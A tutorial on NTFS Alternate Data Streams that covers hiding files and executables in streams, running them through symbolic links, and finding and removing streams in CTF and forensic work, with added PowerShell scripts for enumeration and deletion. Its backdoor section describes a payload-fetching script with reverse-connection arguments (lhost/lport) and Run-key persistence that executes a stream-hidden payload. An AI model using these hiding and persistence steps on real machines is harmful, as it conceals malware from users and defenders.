Application of NTFS Alternate Data Stream Steganography


by chesky

## Contents

#### I. Introduction to NTFS Alternate Data Streams (ADS)

#### II. Using ADS

Writing hidden files (text / image / executable) into a stream

Using ADS on the Windows platform: writing a backdoor

Using ADS on the web: getting a shell (pending)

#### III. ADS in CTF: viewing ADS content

#### IV. Removing ADS

## Content

#### I. Introduction to NTFS Alternate Data Streams (ADS)

Alternate Data Streams (ADS) are a feature of the NTFS file system. Every file has a primary (unnamed) data stream, which is what you see and read normally, and can additionally carry any number of named alternate streams. An alternate stream is attached to the host file, does not appear in an ordinary directory listing, is not counted in the size shown for the file, and is addressed as `file:streamname`.

ADS lets a file carry extra information. For example, when Internet Explorer downloads a file it adds a `Zone.Identifier` stream recording that the file came from the Internet zone, and Windows shows a security warning when the user opens it. Similarly, the URL shortcuts in Favorites carry a `favicon` stream holding the site icon.

Malware also uses ADS to hide backdoor components inside innocuous-looking host files.

#### II. Using ADS

**Best done as administrator (you need write permission on the host file).**

**Syntax: `hostfile:streamname` (the host file, a colon, and the name of the attached stream).**

1. Writing a text file into ADS

First create a host file; in this test the host is 001.txt.

Then write the hidden content into a stream of that file:

```
echo "hidden content" > "001.txt":"hidden.txt"
```

General form: `echo "content to hide" > "host file":"stream name"`.

Afterwards the size shown for the file has not changed, because only the primary stream is counted, but the last-write time has.

You can also attach an existing file with the type command:

```
type "test002.txt" > "001.txt":"test002.txt"
```

General form: `type "file to hide" > "host file":"stream name"`. It is best to enclose the names in quotation marks, otherwise the colon can be misinterpreted.

2. Writing an image/audio/executable file into ADS

The same as for a text file; for example:

```
type "hidden.jpg" > "targe.jpg":"hidden.jpg"
type "Hidden.mp4" > "targe.jpg":"Hidden.mp4"
type "Hidden.exe" >> "Targe.txt":"Hidden.exe"
type "Hidden.exe" >> "Targe.exe":"Hidden.exe"
```

The host file can be of any type. Note that `>` replaces the stream while `>>` appends to it; appending to a stream that already exists corrupts a binary, so use `>` for a fresh copy.
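The same two steps (a text stream and a binary stream on one host file) done from PowerShell, with the checks the text describes: the visible size stays the same, the last-write time moves, and the hidden bytes come back intact. This is an added example, not code from the original post; the names host.txt, secret.txt and payload.bin are assumed, the payload bytes are constructed inline, and the current directory must be on an NTFS volume.

```powershell
# Added example (not from the original post): write text and binary data into
# alternate data streams of a host file with PowerShell and verify the result.
# Assumed names: host.txt (host file), secret.txt / payload.bin (stream names).
# Works on Windows PowerShell 5.1 and PowerShell 7; the byte-stream switch
# differs between the two, hence the $legacy branch.

$hostFile = Join-Path (Get-Location) 'host.txt'
Set-Content -LiteralPath $hostFile -Value 'visible content'
$sizeBefore  = (Get-Item -LiteralPath $hostFile).Length
$mtimeBefore = (Get-Item -LiteralPath $hostFile).LastWriteTime

# Text stream: same effect as   echo "hidden content" > host.txt:secret.txt
Set-Content -LiteralPath $hostFile -Stream 'secret.txt' -Value 'hidden content'

# Binary stream: same effect as   type payload.bin > host.txt:payload.bin
# The bytes are constructed inline (an MZ header followed by filler) so the
# example runs without a real executable on disk.
[byte[]]$payload = [byte[]]((0x4D, 0x5A, 0x90, 0x00) + (1..60))
$legacy = $PSVersionTable.PSVersion.Major -lt 6
if ($legacy) {
    Set-Content -LiteralPath $hostFile -Stream 'payload.bin' -Value $payload -Encoding Byte
} else {
    Set-Content -LiteralPath $hostFile -Stream 'payload.bin' -Value $payload -AsByteStream
}

# Enumerate every $DATA stream on the host; ':$DATA' is the primary (visible) one.
Get-Item -LiteralPath $hostFile -Stream * | Select-Object Stream, Length

# The size reported for the file covers the primary stream only, so it is
# unchanged; the last-write time does move.
$after = Get-Item -LiteralPath $hostFile
"Size before/after: $sizeBefore / $($after.Length)"
"LastWriteTime before/after: $mtimeBefore / $($after.LastWriteTime)"

# Read both streams back and confirm the binary payload round-tripped intact.
Get-Content -LiteralPath $hostFile -Stream 'secret.txt'
if ($legacy) {
    [byte[]]$back = Get-Content -LiteralPath $hostFile -Stream 'payload.bin' -Encoding Byte -ReadCount 0
} else {
    [byte[]]$back = Get-Content -LiteralPath $hostFile -Stream 'payload.bin' -AsByteStream -ReadCount 0
}
$h1 = (Get-FileHash -InputStream ([IO.MemoryStream]::new($payload)) -Algorithm SHA256).Hash
$h2 = (Get-FileHash -InputStream ([IO.MemoryStream]::new($back))    -Algorithm SHA256).Hash
"Payload intact: $($h1 -eq $h2) ($($back.Length) bytes)"
```

From cmd the same stream list is available with `dir /r` in that directory; `Get-Item -Stream *` is the PowerShell equivalent and is also what you would script a check around.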

3. Building a backdoor with ADS on the Windows platform

On Windows XP an executable hidden in a stream could be run directly. Microsoft noticed and closed that hole, so on Windows Vista and later an executable stored in an ADS cannot be launched directly.

Instead, mklink can create a symbolic link whose target is the stream, and running the link runs the hidden executable. Creating the link requires administrator privileges.

```
mklink <Link> "Hidden.txt":Moha.exe
```

`<Link>` is the name of the link file you choose to create; the target is the executable hidden in the Hidden.txt stream.

Here is a method that works under normal user permissions, using a PowerShell script.

Project address

The script takes only two parameters:

```
-url <payload URL> -arguments "Badfunction -lhost 192.168.1.11 -lport 3333 -payload weeeeee"
```

-url is the payload; -arguments holds the parameters that payload needs.

Once run, the backdoor updates a value under

HKCU:\Software\Microsoft\Windows\CurrentVersion\Run. That registry value calls wscript.exe to execute a hidden VBS script; the VBS in turn resolves the payload (which is, of course, also hidden in a stream) and executes it from the AppData directory.

For the details see the script author's articles.

Under Windows 10 this method is of little value, because Windows Defender (WD) will kill the script. A WinRAR self-extracting archive is another option, but that method... well.

From the public information currently available, ADS use is concentrated on the web side. I do not intend to pursue that direction, and will write that part later.

4. Getshell (pending)

#### III. ADS in CTF: viewing ADS content

**If the file came inside an archive, extracting it with software other than WinRAR will lose the data streams, so be sure to unpack it with WinRAR.** Streams are also dropped when a file is copied to a FAT/exFAT volume or sent over any channel that carries only the primary stream.

**It is best not to rely on cmd and Notepad alone to view the streams; the tools below are more convenient.**

1. Viewing with a tool

Using a tool is the quickest and most convenient way. NTFS Streams Info can do this, but it appears to be paid software.

Address: https://ntfs-streams-info.en.softonic.com/

For CTF challenges I use NTFS Streams Editor.

Network disk download: Http://pan.baidu.com/s/1c2zbNaC

2. Using LADS

Network disk download: Http://pan.baidu.com/s/1slTJwMp

Place lads.exe in the same directory as the files you want to check.

```
lads.exe          (lists the hidden streams of every file in the current directory)
lads.exe /S       (also descends into subdirectories)
```

The output shows clearly that 001.txt carries an ADS named test002.txt.

Once you know the stream name, open it directly with a suitable program:

```
notepad.exe test.txt:hidden.txt
mspaint.exe test.txt:hidden.jpg
```

#### IV. Removing ADS

You can delete a stream directly with the NTFS Streams Editor mentioned above.

It can also be removed with Sysinternals streams.exe:

```
streams.exe -d <file>
```

(`streams.exe -s -d <directory>` does the same for a whole directory tree.) If deletion fails with an error, a process still has the stream open; end that process before deleting.
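Sections III and IV together, as an added example that is not part of the original post: the enumeration LADS does and the deletion streams.exe -d does, using only built-in PowerShell, plus an extraction step so each stream can be hashed and examined before anything is removed. The paths C:\cases\target and C:\cases\extracted are assumed placeholders; Zone.Identifier is skipped because it is the benign mark-of-the-web stream on every downloaded file.

```powershell
# Added example (not from the original post): enumerate, extract and delete
# alternate data streams with built-in PowerShell, the same jobs LADS and
# streams.exe -d do above. $root and $outDir are assumed placeholder paths.
# Works on Windows PowerShell 5.1 and PowerShell 7.

$root   = 'C:\cases\target'
$outDir = 'C:\cases\extracted'
$skip   = @('Zone.Identifier')   # benign mark-of-the-web stream; skip it
$legacy = $PSVersionTable.PSVersion.Major -lt 6
New-Item -ItemType Directory -Path $outDir -Force | Out-Null

# 1. Enumerate (LADS /S equivalent): every file has a primary ':$DATA' stream;
#    anything else listed by -Stream * is an alternate data stream.
$findings = foreach ($file in Get-ChildItem -LiteralPath $root -Recurse -File -Force) {
    Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -notin $skip } |
        ForEach-Object {
            [pscustomobject]@{ File = $file.FullName; Stream = $_.Stream; Length = $_.Length }
        }
}
$findings | Format-Table -AutoSize

# 2. Extract: copy each stream out to a regular file so it can be hashed and
#    inspected (file type, strings, sandbox) without opening it in place.
foreach ($f in $findings) {
    $dest = Join-Path $outDir (($f.File -replace '[\\:]', '_') + '__' + $f.Stream)
    if ($legacy) {
        [byte[]]$bytes = @(Get-Content -LiteralPath $f.File -Stream $f.Stream -Encoding Byte -ReadCount 0)
        Set-Content -LiteralPath $dest -Value $bytes -Encoding Byte
    } else {
        [byte[]]$bytes = @(Get-Content -LiteralPath $f.File -Stream $f.Stream -AsByteStream -ReadCount 0)
        Set-Content -LiteralPath $dest -Value $bytes -AsByteStream
    }
    $hash = (Get-FileHash -LiteralPath $dest -Algorithm SHA256).Hash
    '{0}:{1}  {2} bytes  sha256={3}' -f $f.File, $f.Stream, $f.Length, $hash
}

# 3. Delete (streams.exe -d equivalent): Remove-Item -Stream removes only the
#    named stream and leaves the file's primary data untouched. If another
#    process still holds the stream open the call fails; stop that process
#    and run it again.
$remove = $false   # flip to $true only after reviewing $findings and the extracted copies
if ($remove) {
    foreach ($f in $findings) {
        try {
            Remove-Item -LiteralPath $f.File -Stream $f.Stream -ErrorAction Stop
            'Removed {0}:{1}' -f $f.File, $f.Stream
        } catch {
            Write-Warning ('Could not remove {0}:{1} - {2}' -f $f.File, $f.Stream, $_.Exception.Message)
        }
    }
}
```

Extracting before deleting is deliberate: once a stream is removed there is nothing left to analyse, and an investigator usually wants the hash and a copy of the hidden content more than a clean file.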
